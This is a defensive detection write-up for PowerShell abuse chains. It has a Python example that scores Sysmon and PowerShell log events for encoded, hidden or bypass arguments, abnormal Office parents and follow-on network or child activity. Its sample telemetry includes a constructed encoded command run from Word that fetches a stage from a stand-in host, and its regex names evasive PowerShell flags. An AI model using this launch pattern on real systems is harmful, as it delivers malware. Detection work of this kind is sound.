Detects behavioral chains where PowerShell is launched with encoded commands, unusual parent processes, or suspicious modules loaded, potentially followed by network connections or child process spawning. Supports detection of both direct (powershell.exe) and indirect (.NET automation) invocations.

| Data Component | Name | Channel |
|---|---|---|
| Process Creation (DC0032) | WinEventLog:Sysmon | EventCode=1 |
| Command Execution (DC0064) | WinEventLog:PowerShell | EventCode=4104 |
| Process Metadata (DC0034) | WinEventLog:PowerShell | EventCode=400,403 |
| Module Load (DC0016) | WinEventLog:Sysmon | EventCode=7 |

| Field | Description |
|---|---|
| CommandLinePattern | Regex pattern for encoded, obfuscated, or hidden PowerShell arguments (e.g., '-enc', '-nop'). |
| ParentProcessName | Filter based on abnormal parents like Excel, WinWord, or mshta spawning PowerShell. |
| TimeWindow | Scope detection to off-hours, lateral movement timeframes, or non-maintenance windows. |
| LoadedModuleList | Tuneable to monitor rare or never-before-seen .NET assemblies tied to PowerShell abuse. |
| ScriptBlockLengthThreshold | Adjustable threshold for length of script blocks logged by Event ID 4104 (useful for filtering noise). |
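The following is an added worked example, not code from the ATT&CK page or any vendor analytic, showing how the data components and tunable fields above combine into one detection: it scores Sysmon process-creation events for encoded or hidden PowerShell arguments and abnormal parents, flags indirect invocation (a non-PowerShell host loading the automation engine DLL, Sysmon EventCode 7), flags oversized 4104 script blocks, and then correlates each hit with follow-on network connections (EventCode 3) or child processes within a time window. The event dictionaries, field names, config values, IP address, paths and the `ChainWindowSeconds` knob are all constructed assumptions for the example; the `TimeWindow` tunable is modelled here as business hours outside of which a launch is scored higher, and the script-block threshold is read as a minimum length to alert on.

```python
import base64
import re
from datetime import datetime, timedelta

# Tunable fields mirroring the table above; values are illustrative, not recommended defaults.
CONFIG = {
    "CommandLinePattern": re.compile(
        r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e|noprofile|nop|"
        r"windowstyle\s+hidden|w\s+hidden|executionpolicy\s+bypass|ep\s+bypass)\b"),
    "ParentProcessName": {"excel.exe", "winword.exe", "mshta.exe", "outlook.exe"},
    "TimeWindow": (7, 19),                  # business hours; launches outside are scored higher
    "LoadedModuleList": {"system.management.automation.dll"},
    "ScriptBlockLengthThreshold": 4000,     # alert on 4104 script blocks at least this long
    "ChainWindowSeconds": 120,              # assumed correlation window (not an ATT&CK field)
}
ENC_RE = re.compile(r"(?i)\s-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")
PS_HOSTS = ("powershell.exe", "pwsh.exe", "powershell_ise.exe")


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Return the UTF-16LE payload of an -EncodedCommand argument, or None if absent/invalid."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def score_process_creation(ev, cfg=CONFIG):
    """Sysmon EventCode 1: list the reasons a PowerShell launch looks suspicious (empty = benign)."""
    reasons = []
    if basename(ev["Image"]) not in PS_HOSTS:
        return reasons
    if cfg["CommandLinePattern"].search(ev["CommandLine"]):
        reasons.append("suspicious_arguments")
    decoded = decode_encoded_command(ev["CommandLine"])
    if decoded:
        reasons.append(f"encoded_command:{decoded[:40]}")
    parent = basename(ev["ParentImage"])
    if parent in cfg["ParentProcessName"]:
        reasons.append(f"abnormal_parent:{parent}")
    start, end = cfg["TimeWindow"]
    if not start <= datetime.fromisoformat(ev["ts"]).hour < end:
        reasons.append("outside_business_hours")
    return reasons


def is_indirect_invocation(ev, cfg=CONFIG):
    """Sysmon EventCode 7: a non-PowerShell host loading the PowerShell engine assembly."""
    return (ev["EventCode"] == 7
            and basename(ev["ImageLoaded"]) in cfg["LoadedModuleList"]
            and basename(ev["Image"]) not in PS_HOSTS)


def is_oversized_script_block(ev, cfg=CONFIG):
    """PowerShell EventCode 4104: script block at or above the configured length."""
    return ev["EventCode"] == 4104 and len(ev["ScriptBlockText"]) >= cfg["ScriptBlockLengthThreshold"]


def follow_on_activity(proc_ev, events, cfg=CONFIG):
    """Network connections or child processes tied to proc_ev's pid inside the chain window."""
    start = datetime.fromisoformat(proc_ev["ts"])
    deadline = start + timedelta(seconds=cfg["ChainWindowSeconds"])
    found = []
    for ev in events:
        if ev is proc_ev or ev["source"] != "Sysmon":
            continue
        if not start <= datetime.fromisoformat(ev["ts"]) <= deadline:
            continue
        if ev["EventCode"] == 3 and ev["ProcessId"] == proc_ev["ProcessId"]:
            found.append(f"network:{ev['DestinationIp']}:{ev['DestinationPort']}")
        elif ev["EventCode"] == 1 and ev.get("ParentProcessId") == proc_ev["ProcessId"]:
            found.append(f"child:{basename(ev['Image'])}")
    return found


def run_detection(events, cfg=CONFIG):
    """Walk the event stream once and emit one alert dict per suspicious finding."""
    alerts = []
    for ev in events:
        if ev["source"] == "Sysmon" and ev["EventCode"] == 1:
            reasons = score_process_creation(ev, cfg)
            if reasons:
                alerts.append({"pid": ev["ProcessId"], "reasons": reasons,
                               "chain": follow_on_activity(ev, events, cfg)})
        elif is_indirect_invocation(ev, cfg):
            alerts.append({"pid": ev["ProcessId"],
                           "reasons": [f"indirect_invocation:{basename(ev['Image'])}"],
                           "chain": follow_on_activity(ev, events, cfg)})
        elif is_oversized_script_block(ev, cfg):
            alerts.append({"pid": ev.get("ProcessId"), "reasons": ["oversized_script_block"], "chain": []})
    return alerts


# Constructed sample telemetry (not real logs); field names follow Sysmon / PowerShell log conventions.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ENCODED = base64.b64encode("Invoke-WebRequest http://example.invalid/stage".encode("utf-16-le")).decode()
EVENTS = [
    {"ts": "2024-03-05T02:14:01", "source": "Sysmon", "EventCode": 1, "ProcessId": 4120, "ParentProcessId": 3100,
     "Image": PS, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},          # Word spawns hidden, encoded PS
    {"ts": "2024-03-05T02:14:03", "source": "Sysmon", "EventCode": 3, "ProcessId": 4120, "Image": PS,
     "DestinationIp": "203.0.113.5", "DestinationPort": 443},                  # ...then an outbound connection
    {"ts": "2024-03-05T02:14:05", "source": "Sysmon", "EventCode": 1, "ProcessId": 4188, "ParentProcessId": 4120,
     "Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": PS, "CommandLine": "rundll32.exe"},  # ...and a child
    {"ts": "2024-03-05T02:14:04", "source": "PowerShell", "EventCode": 4104, "ProcessId": 4120,
     "ScriptBlockText": "$a=1;" * 1200},                                       # oversized script block
    {"ts": "2024-03-05T02:20:00", "source": "Sysmon", "EventCode": 7, "ProcessId": 5200,
     "Image": r"C:\Users\alice\AppData\Local\Temp\updater.exe",
     "ImageLoaded": r"C:\Windows\Microsoft.NET\assembly\System.Management.Automation.dll"},  # indirect invocation
    {"ts": "2024-03-05T10:05:00", "source": "Sysmon", "EventCode": 1, "ProcessId": 6000, "ParentProcessId": 2000,
     "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1"},           # benign admin launch
]

if __name__ == "__main__":
    for alert in run_detection(EVENTS):
        print(alert)
```

Running the block prints three alerts: the Word-spawned launch (suspicious arguments, decoded encoded command, abnormal parent, off-hours) chained to its network connection and rundll32 child, the Temp-folder binary loading the automation engine, and the oversized script block; the business-hours `-File` launch from explorer.exe produces nothing. In a SIEM the same logic maps to a join on `ProcessId`/`ParentProcessId` across EventCode 1, 3 and 7 within the chain window, with the `CONFIG` entries exposed as the analytic's tunables.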